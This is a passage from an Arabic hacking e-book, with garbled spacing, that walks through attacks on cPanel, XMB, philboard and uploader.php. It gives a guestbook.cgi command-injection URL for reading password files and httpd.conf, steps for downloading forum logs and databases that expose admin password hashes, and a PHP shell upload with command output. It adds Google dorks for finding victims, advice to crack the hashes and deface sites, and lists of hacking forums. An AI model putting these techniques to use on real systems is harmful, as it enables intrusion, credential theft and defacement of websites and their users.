خليبالكانفیه مسافه بعدالعلامه 

"




" 

" ثغره في Bandmin 1.4 

$$$$$$$$$$$$ 

الكاتب : حزمالظامي 

$$$$$$$$$$$$ 

بسماالله الرحمن الرحیم.‏ 

(( cPanel exploit not being fixed )) 

الحقیقة البدایة هذهالثغرهتم اكتشافها من مدة وقدتناقشتها معأخيالحبیبهیك س منأیام وقل تانشرها 

منباب الفائدة ولیحذراصحابالمواقع منها ... 

الثغره هيفي مدیر الباندویث 

المخاطر الجدیدة من سيبانل 

وهذه البرنامجیعطیكتفاصیل وإ حصائیات شهریة ‏...یمكن عن طریقهمعرفة جمیع المواقع على الخادم 

أیضاً‏ ویمكنأنتستثمربطرقأخرى 

) 1.4 ( Bandmin وهيثغره سيبانلكمااعتدنا هذهالایام على 

... 

عموماإذاتریدتنفذالثغرهفهذا مثاللها ... 

http://yourdomain.con/bandwidth/ 

وطریقةإغلاقالثغرهكالتالي : 

وبكلاختصار ضع مل ف ) .htaccess ‏)في هذاالفولدر...‏ 

/usr/local/bandmin/htdocs 

وإلیكم هذهالتفاصیل عن هذهالثغره......‏ 

************************* 

Notice: 

Any Resellers or Dedicated hosts that use cPanel you should be aware 

that there is still an exploit people are using to see what domains are 

hosted on the server. 

If you have cPanel/WHM on your server, just go to your domain and put 

Hopefully you http://yourdomain.con/bandwidth//bandwidth/ after it. 

will get a “ You don't have permission to access /bandwidth/ on this 

server” message or it will ask for a password. 

Otherwise you will be at a page titled “ Bandmin 1.4 (what ever 

٢٤٦




version)” from here you can access the monthly stats with a list of all 

domains with over 1MB of transfer. 

The fix are listed below: 

Make a TXT file with these lines in it: Use your servers IP# for the XXX 

allow from xxx.xxx.xxx.xxx 

deny from all 

Name it .htaccess and place it in the servers /usr/local/bandmin/htdocs 

directory. This will block all but the IP that you use in the .htaccess file. 

************************* 

امافیوجدثغرةالسيبانلالتيلمیتم ذكرهالكناغلب المواقعاغلتهاالان 

cgi-sys/guestbook.cgi?user=cpanel&template 

تكتب هذا الراب ط بعداسمالموقع 

ولكن بعد علامة ‏=|تكتبالامرباللینكس | 

لأستعرا ضباسورد موقع علىالسیرفر 

مثلا 

/cgi-sys/guestbook.cgi?user=cpanel&template=|cat 

/home/XXX/public_html/_vti_pvt/service.pwd| 

وهذاالامرلكياسهل على البع ضاستعرا ض هذاالمل ف مع ملاحظة 

][ lsوهواستعرا ض مابداخلالمل ف][‏ 

او][‏html php ض صفحه داخل مل ف سواءكانت catوهواستعرا ][ 

ترى صلاحیاتكفي رؤیة هذهالصفحه ویمكنك ذالك عن طریق هذاالامر 

lsهذاالامریضهرلك -al الملفات ولو جیتتقراهبالتفصیل هواستعرا ض 

رؤیة الملفاتالتي یسمحلكبرؤیتهالو جیتتقولكی فاقولكتعال 

vi ][ 

lsهواستعرا ض al وهو یضهرلكامامكل مل ف عدتفراغا تاذاكان 

اولفرا غفیها ‏×فماتقدرتشوفه 

ال حینبدخل معاكمفيتفصیل مملللأمر 

][=========][ 

cat /home/XXX/public_html/_vti_pvt/service.pwd 

٢٤٧



][ 


][ 

][ 

][ catزي ما ذكرنا سابقا اللي هواستعرا ضالصفحات 

D عباره عنقسمفي هاردیسك سیرفرلینكس زیه زي homeهو ][ 

او Cفيالویندوز 

][ public_html هذا هو عباره عن مل ف موجود داخلايا فتيبي لاي موقع 

فيالدنیا وهذاالمل ف مهم لانه داخلهتنح طالصفحات ولاحظو 

انه موجودفيالسیرفركل ملفاتال public_html لكلالمواقع 

اللي علىالسیرفر 

][ _vti_pvt وهو مل ف موجودهفیه ملفاتالفرون تبیج 

][ service.pwd وهوالمل فالليبیفیدكفي رؤیةكلباسوردات السیرفر مع 

یوزراتهابس بتكون مشفره ][ 

][ 

][ 

XXX ][ 

اسم الموقعالموجود علىالسیرفروترید رؤیت مل ف 

الفرون تبیجفیه 

----------------------- 

وبعد وجوودالباسوردات طبعا بتلااقیها مشفره 

لانها عباره عن ملفا ت service.pwdلانها ملفات الفرون تبیج 

اذا راحتلاقي:‏ 

# -FrontPageadshhhhg:T_h1rTAnSmwck 

advrsgrent:yTPvsh2SKGI46 

# -FrontPagesfjhsdlj:KH5xpD5HGFQio 

# -FrontPagesdfQKG0nPulR5aY 

# -FrontPageafsdfgrica:7njMXh9/HImTA 

# -FrontPageaftergsdfsgnoo:wyXqflo6kr7TI 

را حتلقاه زيكذاكذا عادانت وشطارتك ببرنامج جوهن ذا ریبر بتفكالتشفیر 

------------------------ 

اوكيال حینبیجي واحد موسوسبیقولفي نفسه طیبانا جبت الباسوردات ‏+الیوزرات 

كی فاعر فاسمالموقع 

اوكياقولكتعال حبیبي 

اكتبالامر ذا 

)) فعلاالوسوسهلهافایدةالیومینذي (( 

cat /etc/httpd/apache/conf/httpd.conf 

في هذا المل ف را ح یستعر ضلككلكبیره وصغیرهفيالسیرفر 

نبتديبشرح هذاالامر : 

٢ ٤٨




][ catتم ذكره ساااا ااابقاً][‏ 

][ etc وهو عباره عن مل ف شبهامنيتخزنفیهالباسوردات وملفات 

اللوج والأشیاء المسموحبهافيالسیرفر 

][ httpd وهو مل فالمواقع الموجوده علىالسیرفر][‏ 

مل ف یوجد داخلالمل فالامنيوتوجدبهمعلومات عن السیرفر 

ونوعه وكل شي یخت صبه 

][ conf وهواختصارلكلمة config وهو مل فبشكل عام یخت ص بكل ماهو 

سريبالموقع مثلالیوزر والباسوردللموقعاولقواعدالبیانات 

][ httpd.conf وهوالمل ف المطلوباللذي یوجدفیهكل شي خا صبالموقع 

اسمه والیوزر الخا صبه ومساحته على السیرفر وایمیل صاحبه ][ 

][ 

][ 

][ 

apache ][ 

وهذااللي را حتلقاه 

PHP: 

ServerAlias w 

ww.NIGHTMARE.com NIGHTMARE.com 

ServerAdmin [email]webmaster@NIGHTMARE.com[/email] 

DocumentRoot /home/NIGHTMARE/public_html 

BytesLog domlogs/NIGHTMARE.com-bytes_log 

User NIGHTMARE 

Group NIGHTMARE 

ServerName w 

ww.NIGHTMARE.com 

CustomLog domlogs/NIGHTMAREcom combined 

ScriptAlias /cgi-bin/ /home/NIGHTMARE/public_html/cgi-bin 

اذالم یب قلك شئ اتكل علىاالله 

وفكالتشفیر 

شغلالا فتيبي وامسحالموقع وحطالاندكس 

والسلام ختاام...‏ 

٢٤٩




" 

ثغرة في نوع 

XMB من المنتدیات 

" 

$$$$$$$$$$$$$$$$ 

الكاتب:‏ MaXhAk2000 

$$$$$$$$$$$$$$$$ 

السلام علیكم ورحمةاالله وبركاته،،،‏ 

اما بعد ((((((( فأناابرئ ذمتي مناياستخدام خاطئلهذهالغره ضداخواننا العرب،واالله على مااقول 

شهید))))))...‏ 

بسماالله نبدأ،،،‏ 

تعتبر المنتدیات من نوع xmb من المنتدیات التياكتسبت شهره واسعهفي مجالها وحالها حالالكثیر من 

الأنوا عالأخر ى من المنتدیات من وجود الثغرات والأختراقاتفلا یوجد شيءكامل على وجهالأر ضالااالله 

عز وجل..‏ 

وص فللثغره::‏ 

وقدتم اكتشا فثغره جدیدهفي هذاالنو ع من المنتدیات مما یمكنكانتكونالمدیر علىالمنتد ىاوتكون 

مشر فاوياي عضواخر 

الأصدارالمصاب:::‏ 

XMB 1.6 Magic Lantern Final 

الشرح والتطبی ق:::‏ 

جا وقت ال شغل والجد ‏>>>سوفاقوم بتقسیم الدرس على خطوات حتى یفهم ویكوناوووضح وأسهل : 

http://www.google.com/ 

7- 

- ‎1‎علیكبالذهابالى موقع جوجل 

‏-‏‎2‎اكتبفي منطقةالب حثFinal XMB 1.6 Magic Lantern 

‏-‏‎3‎سو فترى منتدیاتكثییییییییره اكثرها مصابهبهذهالثغرهلكن رجاااء 

لاتقرب المنتدیاتالعربیة وعلیك بتحذیرها منالثغرهالموجوده.‏ 

‏-‏‎4‎اضغط علىاي منتد ى وقم بكتابةالكلمة التالیة بعد عنوانالمنتدى 

index_log.logیعني راح یكون زيكده 

http://www.******.com/massegboard/index_log.log 

-5 راح ینزل عندك مل ف والمل ف عباره عن مل ف زيالكوكیزكبیر وفیهاسماء 

المستخدمین والباسورد وأشیاءثانیه ماتهمنا.‏ 

- ‎6‎الأن علیكبالبحثفيالمنتدى عناسمالمدیر وذلكبالذهابالىالمواضیع 

وتشو فالأسماء واليتلقىتح تاسمهادمن ستریتورانسخاسمه.‏ 

افتحالمل فالي نزلته من الموقع وسويب حث عناسمالمدیر راح یجیك زي 

كده مثلا::‏ 

xmbuser=admin 

واباس را حتلقاهقدامه زيكده 

xmbpw=1faeb6747a31c854800ddf3c62b1717a 

-8 طبعاالباسفي هذهالحاله مشفر وفكالتشفیرصعبلهذا الغر ضقامت شركة 

٢٥٠




CCI بتصمیمبرنامج یقومبهذا الغر ض وهذهوصلتالبرنامج 

ftp://www.cafecounterintelligence.com/cci/chigger.exe 

‏-‏‎9‎اعدادتالبرنامج كتاليفيالصورة : 

رقم(‏ ‎١‎‏)قمبوضع علامة صح.‏ 

رقم(‏‎٢‎‏)قمبوضعاسم العضو سواء مدیراو غیره 

رقم(‏ ‎٣‎‏)قمبوضعالباس المشفر حقالعضواوالمدیراو غیره 

رقم ‏(‏‎4‎‏)قمبوضع علامة صح.‏ 

رقم(‏ ‎٥‎‏)قمبوضعالبروكسي اليتریدهاوالبروكسي حقمزوده الخدمه حقك 

رقم(‏ ‎٦‎‏)قمبوضعالمنفذ حقالبروكسي 

-10 بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقيانتذهبالى 

المتصفحانترنتاكسبلورر ‏


شرح ثغرة 

" philboard 

" 


$$$$$$$$$$$$$$ 

Hi_HaCkEr 

$$$$$$$$$$$$$$ 


سأذكراحدالثغراتفي بع ضاللغاتالدینامیكیة ( asp) active server pages 

طبعا هذهاللغة وللأ س فبهاثغرات عدیدة و خصوصافيالتعامل معقواعدبیاناتها 

. 

بشكل مختصر هذه اللغةتعتبر منلغات البرمجةالدینامیكیة التفاعلیةلبرمجة مواقعالانترنت ولها میزة 

بأن الكودلها مخفي 

وتعتمدقواعدبیاناتها علىثلاثةأنوا عهي 

: 

sqlserver && sql && M.S Access 

واماقاعدةبیانات ما یكروسوفتأكسسفثغراتها منأبس طالثغراتب حی ث انكاذا وجد تامتدادا واسم 

قاعدةالباناتفقطفانكتستطیعتحمیلها على جهازك مباشرة وتصفح جمیعالباسوردا تبسهولة ویسر 

وبدونتشفیرأیضا . 

والیكمالمثال منأحد المنتدیاتالتي تتضح جلیهبها هذهالثغرة وهيباسم philboard.asp 

مثل هذا المنتد ى http://www.khill.co.uk/forum/philboard.asp 

وطریقةایجاد مثل هذاالنو ع منتدیا تاذهبالى جوجلكما ذكرنا سابقا واب حث عن 

philboardوانتظر النتائج....‏ 

> -------------- 

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 

كی فتحملقاعدةالبیانا ت ؟ 

اكتب هذاالامتداد 

وبعد ذلك حاولان یكونالمنتد ىبه عدیدقلیل منالمواضیع حتى یكون حجمقاعدةالبیانات صغیر جدا 

للتطبیق والتسلیمبسرعة 

وهذا هوامتداد واسمقاعدةالبیاناتلقاعدةالبیانات 

database/philboard.mdb 

وتكتبه بعداسمالموقع والمنتد ى مثل 

http://www.khill.co.uk/forum/database/philboard.mdb 

ولابدلكيتقراقاعدةالبیانا تان یكونفي جهازكبرنامج ما یكروسوفتأكسس 

وبعد فتحقاعدةالبیانات ستجدبداخلها عدة جداولفیعا جمیع محتویاتقاعدةالبیانات 

من ضمنها وهوالمهم جدولالمستخدمینال users 

٢٥٢




وستجداولاسم عالبا هو admin وهو اسمالمدیر العام معالباسوورد 

والحللهذهالثغرة ‏/هوتغییر مسارقواعدالبیاناتلكل منتد ى ‏.فكما رایناان منتدیات philboard.asp 

قواعدبیاناتها جمیعالها نفسالاسم والامتداد.....‏ 

٢٥٣


" 

شرح ثغرة uploader.php 


" 

$$$$$$$$$$$$$$ 

الكاتب Hi_HaCkEr: 

$$$$$$$$$$$$$$ 

هيثغرةفيبرنامج uploader.php وهو متوفرباصدارة ١٫١ وتسمحلكبرفعاي مل فاوحتى 

سكربتا ت php 

وتستطیعتحمیله من http://www.phpscriptcenter.com/uploader.php 

الاسكربت مناسمهیتضحبانهیعطیك میزة رفع ملفاتلموقعك مباشرةلكن ‏((بوجودباسورد )) 

طیباذالم یكن محمى بباسوورداذاالسیرفركله سیصبحتح ت سیطرتكاذالم یكنفي حالة 

safe_modeامااذاكان سی ف مودفالموقعفقط سیصبحتح ت سیطرتك 

اذا حملت الملفلموقعكفقم بتغییر الباسووردوتستطیع عمل ذلك من مل ف setup.php 

openافتح setup.php and edit these options المل ف واستعر ض هذا الاعدادات 

-------------------------------------------------------------------------------------- 

$ADMIN[RequirePass] = "Yes"; // Checks to see if upload has a vaild 

password 

$ADMIN[Password] = "password"; // This is the password if the above 

قم بتغییر الباسوورد منهنااا 

option is Yes 

$ADMIN[UploadNum] = "5"; // Number of upload feilds to put on the 

htmlعددالملفات 

page 

$ADMIN[directory] = "uploads"; // The directory the files will be 

(777 uploadedاسم to (must be chmoded to مجلد المل ف اتركهكماهواو غیرهفلك 

الخیار 

---------------------------------------------------------------------------------------- 

طبعاانلم یكنالملف محمي بباسوورد فتستطیعتحمیلاي مل ف وسیكونبداخل 

فاذا رفعنها مثلا هذاالاسكربت 

مجلدuploads 

 

سنصللل cmd ونستطیعتنفیذاوامر علىالسیرفر ...... etc 

فاذا نفذنا 

٢٥٤




http://www.victim.com/uploads/shellemul.php?cmd=id 

سیكون الناتج مثلا 

uid=21(apache) gid=21(apache) groups=21(apache) 

طبعا هذا سكرب تبسی ط ولمزید منالرفاهیةارفع سكربتالشلاواي سكربت مماثلله واستمتع ‏(انلم 

یكنالسیرفرفي حالة سی ف مود ( 

طریقةالب حث عن هذه الثغرة 

ابحثفي جوجل متبعا هذهالطریقة 

allinurl: uploader.php 

وستر ى النتائج 

وختاما اتمنىان یكون الموضو ع مفیداللجمیع.........‏ 

٢٥٥




" 

أفضل المنتدیات العربیة للهاكر 

" 

$$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$$ 

أقدلكمأفضل المواقع والمنتدیاتالعربیةفي مجالالهاكبجمیع مجالته على حدمعرفتي:::‏ 

.١ 

.٢ 

.٣ 

.٤ 

.٥ 

.٦ 

.٧ 

.٨ 

.٩ 

.١٠ 

منتدیات العاصفة منظمة هاي هكر 

منتد ى شبكةالحزمالإ سلامیة.‏ 

منتد ىابن مصر.‏ 

منتد ىالعقربالأحمر http://www.redstaing.ocm 

منتدىإعصار.‏ 

منتد ىمعتز ن ت.‏ 

منتد ىهاكرفلسطین.‏ 

موقع 

منتد ى نجم دوس.‏ http://www.naajm.com/vb 

منتدىامبراطوریةالعرب 

http://www.3asfh.com/vb ( 

) 

http://www.7azm.net/vb/ 

http://www.ebnmasr.net/vb/ 

http://www.e3sar.com/vb/ 

http://www.emoataz.com/vb/ 

http://www.h4palestine.com/ 

http://www.pharaonics.net/ 

http://www.arabse.net/forums/ 

هذه افضل مارأیتهوتصفحته عن المواقعالعربیة التيتدعم علم الهاك...‏ 

٢٥٦




" 

أفضل مواقع الأمن والهاك الإنجلیزیة 

" 

$$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$$ 

هذه بع ض المواقع المهمةالتي یستخدمهاالهكرلمعرفةاخر الثغراتالصادره مع مقالا تبسیطلهذه 

المواقع 

موقعSecurity Packet Storm 

---------------------- 

العنوان : http://packetstorm.securify.com/ 

واحد مناكبرقواعد البیاناتالتيتحمل كعلومات متعلقةبالأمن 

انا افضل الذهابالى هذاالموقع مرهفيالیوملقراءةقسم Today' 'New Files سواءاللب حث عن 

ثغراتمعینهاولأ.‏ 

اوجد الارشی ف عن طریق Ken Williams حیثان هذاالموقع یستهلك مئاتالالو ف منالنقراتكل 

اسبو ع 

حالیاانتقلت ملكیتهالى مالك ) Kroll-O-Nagra (.http://www.securify.com/ 

موقعFocus Security 

---------------- 

العنوان : http://www.securityfocus.com/ 

قاعدةبیاناتاخر ىكاملة . تتحد ث یومیافهؤلاء الشبابالقائمون على هذا الموقع لا ینامونابدا!‏ 

BugTraq 

-------- 

: مستضیفه موقع(‏ http://www.securityfocus.com/ Security Focus ‏),وسابقا 

كان مستضیفة ) (Netspace .(http://www.netspace.org/ 

العنوان 

BugTraqواحدة منافضلقائمة المراسلات البریدیة mailing list التي تتهتمبالامنالالكتروني 

هذه القائمة یقوم علیها رئی ساسمه (aleph1@underground.org). Aleph1‎یستقبل الرسائل 

التيترسلها ( عنثغرةمعینه مثلا ( ویقوم بت حلیلهاوتنضیفها منال spamsوالرسائلالتيلیسلها 

فائدةاو الثغرات القدیمةثم یقومبإرسال الرسالهالممتازهفق ط الى جمیعالمشتركینفي القائمة 

انص حكبالتسجیل 

تستطیعایضاالبحثفيارشیفاتهاالتيتعتبرلدي منافضلقواعدالبیانات وذلك عن طریق دخول الموقع 

ثم الب حث عن رابط'‏search‏'‏ 

http://www.securityfocus.com/ 

الب حثSearching 

------------ 

اذاكنتترید الب حث عنثغرة متعلقةبخدمهمعینة مثلا Sendmailفستحتاجلكتابت 8.8.3 

local DoS حث عنثغرهمعینه مثلا هجوم حجب الخدمه sendmail‏'واذااردتالب '8.8.3 

نسخه 

فما علیكالا كتابتالتالي sendmail' 'local DoS ‏:بدون علامات 

ضداي 

الاقتباس . 

من sendmail 

وهذه بع ض المواقعالاخرى:::‏ 

٢٥٧



http://rootshell.redi.tk/ 

موقع http://www.ussrback.com 

http://www.insecure.org/sploits.html 

http://www.linux.com.cn/hack.co.za 

موقع 

موقع 

موقع 


.٢ 

.٣ 

.٤ 

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 

= 

أمابالنسبةلمواقع الهاكالإنجلیزیةفمعرفتيبها ضئیلة لعدمتوسعيفي اللغةالإنجلیزیة،‏ وهذه المواقع 

كالتالي:::‏ 

موقع 

موقع 

موقع 

http://www.haker.com.pl 

http://www.webattack.com/ 

http://blacksun.box.sk 

موقع http://www.blackcode.com 


.٢ 

.٣ 

.٤ 

... 

٢٥٨



الخاتمة 


نحمداالله ونشكره علىان وفقنا لإتمام هذاالكتاب والذي لانرجوا من وراءهالاالخیر والثواب 

فلاتنسونا من دعوةفي ظهرالغیبلنا ولإ خوانناالمسلمینفيكل مكان.‏ 

لكن ننوه هنا اللا شيءقد یقول البع ض هذاالكتاب لا یحتوي على شرو حللثغرات ومن هذاالقابیل 

لكن نقول ن حنأنه یجبفيالبدایةالتأسیس ومنثم ینطلق الشخ صفي هذا العلم الذي لا ینتهى 

ویفقه نفسهبنفسه،،‏ وأیضاأنالثغراتلها وقت محددوت نتهي ویتمترقیعالكن شرحنا بعضها منأجلباب 

العلمبالشيء وللإ ستفادة لا غیر...‏ 

هذا وصلىاالله على النبي الختار محمدابن عبداالله عدد ماتراكمتالسحب وعدد ماتزاخرتالنجوم 

والسلام علیكم ورحمةاالله وبركاته،،،‏ 

... 

++++++++++++++++++++++++ 

+ 

+ Hi_hacker@hotmail.com 

+ Maxhak2000@hotmail.com 

++++++++++++++++++++++++ 

أياستفسارأو نصیحهیرجى مراسلة:-‏ 

٢٥٩

Sites UnDeR UtTaCk www.3asfh.com/vb ١

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?